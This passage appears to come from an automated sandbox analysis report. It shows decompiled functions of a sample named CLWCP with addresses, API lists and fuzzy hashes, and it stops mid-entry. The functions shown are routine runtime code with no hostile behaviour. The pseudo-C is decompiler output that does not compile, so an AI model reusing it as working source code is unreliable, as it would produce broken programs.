                                  Function 00406A8C, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406A8C(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                  0x00406a8f
                                  0x00406a96
                                  0x00406a9b
                                  0x00406aa1
                                  0x00406aa6

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: 988c9263a3d7fa4446e6752a6436000b074c09a49b2dd22cc2c6a0658e6c25d7
                                  • Instruction ID: 9c07ab404b808133c060a1af8f80c56271c62a36c77e1d8065355d1264372c18
                                  • Opcode Fuzzy Hash: 988c9263a3d7fa4446e6752a6436000b074c09a49b2dd22cc2c6a0658e6c25d7
                                  • Instruction Fuzzy Hash: 6FB002C49112013DEC5477B25C0BD7F055C9D9570C3824AEE7806B3083997D98210479
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046CA30, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0046CA30(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed char _v25;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				int _t54;
				char* _t56;
				int _t58;
				intOrPtr* _t77;
				void* _t85;
				intOrPtr _t87;
				void* _t91;
				intOrPtr _t94;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr _t124;
				char _t142;
				intOrPtr _t144;
				intOrPtr _t145;

				_t140 = __edi;
				_t144 = _t145;
				_t114 = 7;
				do {
					_push(0);
					_push(0);
					_t114 = _t114 - 1;
				} while (_t114 != 0);
				_push(_t114);
				_t142 = __edx;
				_t113 = __eax;
				_push(_t144);
				_push(0x46cc04);
				_push( *[fs:eax]);
				 *[fs:eax] = _t145;
				_t115 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x120))();
				E0040C4B8(_v16, _t115,  &_v20);
				E0040C4B8(_t142, _t115,  &_v24);
				_t54 = E004043DC(_v24);
				_t56 = E004045DC(_v24);
				_t58 = E004043DC(_v20);
				if(CompareStringA(0x400, 0, E004045DC(_v20), _t58, _t56, _t54) == 2 || E004043DC(_t142) == 0) {
					L17:
					_pop(_t124);
					 *[fs:eax] = _t124;
					_push(0x46cc0b);
					E0040411C( &_v64);
					E0040411C( &_v52);
					E0040411C( &_v32);
					return E00404140( &_v24, 5);
				} else {
					_t118 =  &_v8;
					E0046BBC8(_t142, _t113,  &_v8,  &_v25, __edi, _t142,  &_v12);
					_t77 =  *((intOrPtr*)(_t113 + 0x2a8));
					if(_t77 == 0) {
						__eflags = _v25;
						if(_v25 == 0) {
							E0046C898(_t113, _t113,  &_v8, _v8, _t142);
						} else {
							_v48 = _v25 & 0x000000ff;
							_v44 = 2;
							_v40 = _v8;
							_v36 = 0xb;
							_t118 = 1;
							E00408F74(0x46cc1c, 1,  &_v48,  &_v32);
							E0046C898(_t113, _t113, 1, _v32, _t142);
						}
					} else {
						_t118 =  *_t77;
						 *((intOrPtr*)( *_t77 + 0x114))();
					}
					if(E00404720(0x46cc2c, _v12) > 0) {
						L11:
						E0046C9A8(_t113, _v12, _t151);
						goto L17;
					}
					_t85 = E00404720(0x46cc38, _v12);
					_t151 = _t85;
					if(_t85 <= 0) {
						_t87 = E004043DC(_v12);
						__eflags = _t87;
						if(_t87 > 0) {
							E0046C5F4(_t113, _t113, _t118, _v12, _t142);
							_t91 = E0040850C(_v12);
							__eflags = _t91 + 1;
							if(_t91 + 1 == 0) {
								_v60 = _t142;
								_v56 = 0xb;
								_t94 =  *0x46fd20; // 0x410948
								E00405C70(_t94,  &_v64);
								E0040B86C(_t113, _v64, 1, _t140, _t142, 0,  &_v60);
								E00403B64();
							} else {
								E0046C5A4(_t113,  &_v52);
								__eflags = _v52;
								if(__eflags == 0) {
									E0046C9A8(_t113, _v12, __eflags);
									E0046C5F4(_t113, _t113, _t118, _v12, _t142);
								}
							}
						}
						goto L17;
					}
					goto L11;
				}
			}
































                                  0x0046ca30
                                  0x0046ca31
                                  0x0046ca33
                                  0x0046ca38
                                  0x0046ca38
                                  0x0046ca3a
                                  0x0046ca3c
                                  0x0046ca3c
                                  0x0046ca3f
                                  0x0046ca42
                                  0x0046ca44
                                  0x0046ca48
                                  0x0046ca49
                                  0x0046ca4e
                                  0x0046ca51
                                  0x0046ca59
                                  0x0046ca5b
                                  0x0046ca67
                                  0x0046ca71
                                  0x0046ca79
                                  0x0046ca82
                                  0x0046ca8b
                                  0x0046caab
                                  0x0046cbd1
                                  0x0046cbd3
                                  0x0046cbd6
                                  0x0046cbd9
                                  0x0046cbe1
                                  0x0046cbe9
                                  0x0046cbf1
                                  0x0046cc03
                                  0x0046cac0
                                  0x0046cac4
                                  0x0046cacc
                                  0x0046cad1
                                  0x0046cad9
                                  0x0046cae7
                                  0x0046caeb
                                  0x0046cb29
                                  0x0046caed
                                  0x0046caf5
                                  0x0046caf8
                                  0x0046caff
                                  0x0046cb02
                                  0x0046cb09
                                  0x0046cb13
                                  0x0046cb1d
                                  0x0046cb1d
                                  0x0046cadb
                                  0x0046cadd
                                  0x0046cadf
                                  0x0046cadf
                                  0x0046cb3d
                                  0x0046cb50
                                  0x0046cb55
                                  0x00000000
                                  0x0046cb55
                                  0x0046cb47
                                  0x0046cb4c
                                  0x0046cb4e
                                  0x0046cb5f
                                  0x0046cb64
                                  0x0046cb66
                                  0x0046cb6d
                                  0x0046cb75
                                  0x0046cb7a
                                  0x0046cb7b
                                  0x0046cba3
                                  0x0046cba6
                                  0x0046cbb3
                                  0x0046cbb8
                                  0x0046cbc7
                                  0x0046cbcc
                                  0x0046cb7d
                                  0x0046cb82
                                  0x0046cb87
                                  0x0046cb8b
                                  0x0046cb92
                                  0x0046cb9c
                                  0x0046cb9c
                                  0x0046cb8b
                                  0x0046cb7b
                                  0x00000000
                                  0x0046cb66
                                  0x00000000
                                  0x0046cb4e

                                  APIs
                                  • CompareStringA.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,?,?,00000006,00000000,00000000), ref: 0046CAA1
                                    • Part of subcall function 0046C898: CompareStringA.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,00000000,0046C96C,?,?,?,00000000,00000000,00000000), ref: 0046C903
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: String$Compare$Load
                                  • String ID: %s:%s$HA
                                  • API String ID: 2066347653-1752211433
                                  • Opcode ID: 51c50ebdc3c37ae6a9cd4d440bf09c5631faeaa82b00890fd4f01f5973f2bd56
                                  • Instruction ID: 9a01df2e92f6cf8c7730ba442fa4e04aa62ca30b316586a33a06b1684af1fe0c
                                  • Opcode Fuzzy Hash: 51c50ebdc3c37ae6a9cd4d440bf09c5631faeaa82b00890fd4f01f5973f2bd56
                                  • Instruction Fuzzy Hash: 25512370A001099BDB00EBA5DC82AAEB7B5AF44704F50457BF941F7392EB7CAD05CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409E14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00409E14(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x409ef2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E0040411C(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t63 > 2) {
					E004041B4( &_v8, 0x409f14);
				} else {
					E004041B4( &_v8, 0x409f08);
				}
				_t32 = E004045DC(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E0040438C(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E0040463C( *_t49, E004043DC( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00409EF9);
				return E0040411C( &_v8);
			}













                                  0x00409e21
                                  0x00409e24
                                  0x00409e26
                                  0x00409e2a
                                  0x00409e2b
                                  0x00409e30
                                  0x00409e33
                                  0x00409e38
                                  0x00409e44
                                  0x00409e4f
                                  0x00409e5a
                                  0x00409e61
                                  0x00409e7a
                                  0x00409e63
                                  0x00409e6b
                                  0x00409e6b
                                  0x00409e8e
                                  0x00409ea7
                                  0x00409eb6
                                  0x00409ebc
                                  0x00409ed7
                                  0x00409ed7
                                  0x00409ebc
                                  0x00409ede
                                  0x00409ee1
                                  0x00409ee4
                                  0x00409ef1

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409EF2), ref: 00409E9A
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409EF2), ref: 00409EA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 2a1702e2e5aa8a2aa3fa3796a6bacc83230ba2ce9594008f16d12f844dc9edb9
                                  • Instruction ID: af86f1f41243284e4a077272219f45904d7fc575bc6f0358a1c7d0518b019858
                                  • Opcode Fuzzy Hash: 2a1702e2e5aa8a2aa3fa3796a6bacc83230ba2ce9594008f16d12f844dc9edb9
                                  • Instruction Fuzzy Hash: E32147706001189FDB11EB95C842AAE77E8EF49340F50447BB945F73D3D6789E40D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EEB4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040EEB4(signed short* __eax, void* __ecx, signed short* __edx) {
				intOrPtr* _v16;
				void* _t15;
				signed short* _t23;
				signed short _t34;
				signed short* _t35;
				void* _t36;

				_t12 = __eax;
				_push(__ecx);
				_t35 = __edx;
				_t23 = __eax;
				if(( *__eax & 0x0000bfe8) != 0) {
					_t12 = E0040EBBC(__eax, __ecx);
				}
				_t34 =  *_t35 & 0x0000ffff;
				if(_t34 >= 0x14) {
					if(_t34 != 0x100) {
						if(_t34 != 0x101) {
							if((_t34 & 0x00002000) == 0) {
								if(E00410618(_t34, _t36) == 0) {
									_push(_t35);
									_push(_t23);
									L0040D6BC();
									_t15 = E0040E90C(_t14);
								} else {
									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
								}
							} else {
								_t15 = E0040ECE0(_t23, 0x40eeac, _t35);
							}
						} else {
							 *_t23 = _t34;
							_t23[4] = _t35[4];
							_t15 =  *0x47081c();
						}
					} else {
						 *_t23 = 0x100;
						_t23[4] = 0;
						_t15 = E00404170( &(_t23[4]), _t35[4]);
					}
				} else {
					_push(_t35);
					_push(_t23);
					L0040D6BC();
					_t15 = E0040E90C(_t12);
				}
				return _t15;
			}









                                  0x0040eeb4
                                  0x0040eeb7
                                  0x0040eeb8
                                  0x0040eeba
                                  0x0040eec1
                                  0x0040eec5
                                  0x0040eec5
                                  0x0040eeca
                                  0x0040eed1
                                  0x0040eee6
                                  0x0040ef04
                                  0x0040ef1e
                                  0x0040ef3b
                                  0x0040ef4e
                                  0x0040ef4f
                                  0x0040ef50
                                  0x0040ef55
                                  0x0040ef3d
                                  0x0040ef49
                                  0x0040ef49
                                  0x0040ef20
                                  0x0040ef29
                                  0x0040ef29
                                  0x0040ef06
                                  0x0040ef06
                                  0x0040ef0c
                                  0x0040ef11
                                  0x0040ef11
                                  0x0040eee8
                                  0x0040eee8
                                  0x0040eeef
                                  0x0040eef8
                                  0x0040eef8
                                  0x0040eed3
                                  0x0040eed3
                                  0x0040eed4
                                  0x0040eed5
                                  0x0040eeda
                                  0x0040eeda
                                  0x0040ef5e

                                  APIs
                                  • VariantCopy.OLEAUT32(?), ref: 0040EED5
                                    • Part of subcall function 0040EBBC: VariantClear.OLEAUT32 ref: 0040EBCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCopy
                                  • String ID: t@
                                  • API String ID: 274517740-2916730932
                                  • Opcode ID: 6dcb7ba0a561c2223bc3a5af24b5a71d036ed7d743c943f5fd6dfd972e5d73d4
                                  • Instruction ID: 8994ad03886c784a2654f85716dd698a9b671267131c1fde0e9a1973effc0b39
                                  • Opcode Fuzzy Hash: 6dcb7ba0a561c2223bc3a5af24b5a71d036ed7d743c943f5fd6dfd972e5d73d4
                                  • Instruction Fuzzy Hash: 0A11E3603002159AC720AB2BC88556773A5AF943107108D7FF50EAB3C6CA3CCC65C29E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434F44, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00434F44(void* __eflags, intOrPtr _a4) {
				signed char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1a0));
				_t45 = E00413D88( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1a0)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00413D2C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043452C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5 & 0x000000ff;
			}








                                  0x00434f4d
                                  0x00434f5a
                                  0x00434f6d
                                  0x00434f71
                                  0x00434fc1
                                  0x00434fc1
                                  0x00434f73
                                  0x00434f73
                                  0x00434f73
                                  0x00434f7d
                                  0x00434f83
                                  0x00000000
                                  0x00434f8b
                                  0x00434f90
                                  0x00434fa4
                                  0x00434fbb
                                  0x00000000
                                  0x00000000
                                  0x00434fbb
                                  0x00000000
                                  0x00434fbd
                                  0x00434fbd
                                  0x00000000
                                  0x00434f73
                                  0x00434fc5
                                  0x00434fcf

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: 097100ed2a9cdc653471c9aec5da47cff653264ac5bb1fe5dee24695c196ff0f
                                  • Instruction ID: af3cc192eda19465cf2f70e6e545a958ddf3588bee48de993ecc95bd4cc90bfd
                                  • Opcode Fuzzy Hash: 097100ed2a9cdc653471c9aec5da47cff653264ac5bb1fe5dee24695c196ff0f
                                  • Instruction Fuzzy Hash: FF119131A042586BC711DB6DC885BDFBBE89F89358F084296FC04EB382D779ED058794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004254F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004254F0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x47092f != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x470910; // 0x4254f0
					 *0x470910 = E0042525C(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x470910(_a4, _a8, _t19);
				}
				return _t16;
			}













                                  0x004254f6
                                  0x00425500
                                  0x0042552a
                                  0x00425533
                                  0x0042555b
                                  0x0042555b
                                  0x00425535
                                  0x00425535
                                  0x0042553a
                                  0x00000000
                                  0x00000000
                                  0x0042553a
                                  0x00425502
                                  0x00425507
                                  0x00425514
                                  0x00425526
                                  0x00425526
                                  0x00425566

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042553E
                                  • GetSystemMetrics.USER32 ref: 00425550
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  • Opcode ID: e6396284c935fda38f3badd850c7b0fb59f1f381c3ccf8bba0c2c8c3f06479c2
                                  • Instruction ID: bd0f89ff65b76ce3f94aa249a8cc02b7ab813a5378104eb856ff483ba45d6f6e
                                  • Opcode Fuzzy Hash: e6396284c935fda38f3badd850c7b0fb59f1f381c3ccf8bba0c2c8c3f06479c2
                                  • Instruction Fuzzy Hash: 120184B130265CFBEB008F55FC4476A7756EB80794F844026FA18CA262D3B59DC18BAC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004253C8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004253C8(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x47092e != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x47090c; // 0x4253c8
					 *0x47090c = E0042525C(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x47090c(_t14, _t17);
				}
				return _t19;
			}












                                  0x004253ce
                                  0x004253d1
                                  0x004253db
                                  0x00425400
                                  0x00425409
                                  0x00425430
                                  0x00425430
                                  0x004253dd
                                  0x004253e2
                                  0x004253ef
                                  0x004253fc
                                  0x004253fc
                                  0x0042543b

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00425419
                                  • GetSystemMetrics.USER32 ref: 00425425
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect
                                  • API String ID: 1792783759-4033241945
                                  • Opcode ID: 1e3ed7eee574d966d8848bd7e08268a0e3f8f1bdb1bf6a3e27f2d88e142ffc70
                                  • Instruction ID: 5fd5a1eb530092bedcc282062d2cafa90393f572cf44a4f2556b122fa145a19d
                                  • Opcode Fuzzy Hash: 1e3ed7eee574d966d8848bd7e08268a0e3f8f1bdb1bf6a3e27f2d88e142ffc70
                                  • Instruction Fuzzy Hash: 35018FB1302528ABE710AF14E885766F764D740356FE48062EA08CA213C378ACC08BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043D5D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0043D5D0(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E004426DC(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043D634(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x432b58
						E0043D4B0(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x432b58
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L004251E4();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}








                                  0x0043d5d9
                                  0x0043d5de
                                  0x0043d5e0
                                  0x0043d5eb
                                  0x0043d5ed
                                  0x0043d5f0
                                  0x0043d5f4
                                  0x0043d5fb
                                  0x0043d602
                                  0x0043d60a
                                  0x0043d60f
                                  0x0043d612
                                  0x0043d616
                                  0x0043d61a
                                  0x0043d61b
                                  0x0043d623
                                  0x0043d625
                                  0x0043d625
                                  0x0043d5f0
                                  0x0043d62e

                                  APIs
                                    • Part of subcall function 0043D634: 734518F0.COMCTL32(?,00000000,0043D5F9,00000000,00000000,00000000), ref: 0043D64C
                                    • Part of subcall function 0043D4B0: ClientToScreen.USER32(?,0043D67C), ref: 0043D4C8
                                    • Part of subcall function 0043D4B0: GetWindowRect.USER32 ref: 0043D4D2
                                  • 73451850.COMCTL32(?,?,X+C,?,00000000,00000000,00000000), ref: 0043D61B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: 73451873451850ClientRectScreenWindow
                                  • String ID: X+C$X+C
                                  • API String ID: 1718620977-724829664
                                  • Opcode ID: 09c76a2e99de3ba85b68b45e8826b77c6c3adcbc68e9107dc2f32271fb8d6f70
                                  • Instruction ID: af31a62c4d03ddc0e6fe3a9a2208f73a0359d994ba4e6eb81f7e4ef9f3d787b9
                                  • Opcode Fuzzy Hash: 09c76a2e99de3ba85b68b45e8826b77c6c3adcbc68e9107dc2f32271fb8d6f70
                                  • Instruction Fuzzy Hash: F9F04F72F001086B8B10DEDED8C189EF3ACAB4C214F00417BB518D3341D674ED158B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040CDB8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E0040CDB8(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E004036BC(_t6, _t21);
				}
				_t20 = _t6;
				E00403368(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E00403368(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E00403714(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









                                  0x0040cdb8
                                  0x0040cdbc
                                  0x0040cdbe
                                  0x0040cdc1
                                  0x0040cdc1
                                  0x0040cdc8
                                  0x0040cdce
                                  0x0040cdd3
                                  0x0040cde7
                                  0x0040cdf7
                                  0x0040cdfa
                                  0x0040ce0d
                                  0x0040ce10
                                  0x0040ce14
                                  0x0040ce16
                                  0x0040ce1b
                                  0x0040ce22
                                  0x0040ce29

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,0041AE0D,00000000,0041AE61), ref: 0040CDE2
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,0041AE0D,00000000,0041AE61), ref: 0040CDF2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateEvent
                                  • String ID: ({@
                                  • API String ID: 2692171526-1929916391
                                  • Opcode ID: 48b51a8373e43aff3dda2fb1b1f48e077c36082fffcfcd05a176355ed6f658e4
                                  • Instruction ID: 9780d465e1e518e3ca1363ee2e43962497efa763dcb4dc7aa27ea2224ee67bb5
                                  • Opcode Fuzzy Hash: 48b51a8373e43aff3dda2fb1b1f48e077c36082fffcfcd05a176355ed6f658e4
                                  • Instruction Fuzzy Hash: 76F0C2727407119BD230AF2D4C82B057A94AF02B35F24433AB5B5BF7D1DB795904479D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425340, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
